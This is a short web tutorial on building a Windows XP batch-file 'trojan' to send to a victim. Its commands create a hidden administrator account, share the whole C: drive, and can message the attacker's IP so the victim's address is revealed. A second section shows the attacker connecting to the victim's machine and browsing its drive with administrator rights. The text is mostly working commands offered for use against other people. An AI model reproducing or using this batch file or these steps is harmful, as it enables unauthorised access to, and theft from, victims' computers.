Make Your Own Trojan In A .bat File!

Make Your Own Trojan In A .bat File!

Genres:Open a dos prompt we will only need a dos prompt and windows xp operating system-Basics-Opening a…
Open a dos prompt we will only need a dos prompt and windows xp operating system-Basics-Opening a dos prompt -> Go to start and then execute and typecmd and press okNow insert this command: netAnd you will get something like thisNET [ ACCOUNTS COMPUTER CONFIG CONTINUE FILE GROUP HELP HELPMSG LOCALGROUP NAME PAUSE PRINT SEND SESSION SHARE START STATISTICS STOP TIME USE USER VIEW ]In this tutorial we well use 3 of the commands listed herethey are: net user , net share and net sendWe will select some of those commands and put them on a .bat file.What is a .bat file?Bat file is a piece of text that windows will execute as commands.Open notepad and write there:dirpauseAnd now save this as test.bat and execute it.Funny ain't it ?
---------------------- Starting --------------------
Server:-The plan here is to share the C: drive and make a new userwith administrators accessStep one -> Open your dos prompt and a notepad.The dos prompt will help you to test if the commands are okand the notepad will be used to make the .bat file.Command #1-> net user prudhvi /addWhat does this do? It makes a new user called prudhvi you can putany name you wantCommand #2-> net localgroup administrators prudhvi /addThis is the command that make your user go to the administratorsgroup.Depending on the windows version the name will be different.If you got an American version the name for the groups is Administrators and for the Portuguese version is administrators so it's nice you know which version of windows xp you are going to try share.Command #3->net share system=C:\ /unlimitedThis commands share the C: drive with the name of system.Nice and those are the 3 commands that you will need to put on your .bat file and send to your friend.-!extras!-Command #4-> net send urip I am ur serverWhere it says urip you will insert your ip and when the victim opens the .bat it will send a message to your computer and you can check the victim ip.->To see your ip in the dos prompt put this command: ipconfig
-----------------------: Client :----------------
Now that your friend opened your .bat file her system have the C: drive shared and a new administrator user.First we need to make a session with the remote computer with the net use command,you will execute these commands from your dos prompt.Command #1 -> net use \\victimip neoThis command will make a session between you and the victim.Of course where it says victimip you will insert the victim ip.Command #2-> explorer \\victimip\system And this will open a explorer windows in the share system which is the C:/ drive with administrators access!

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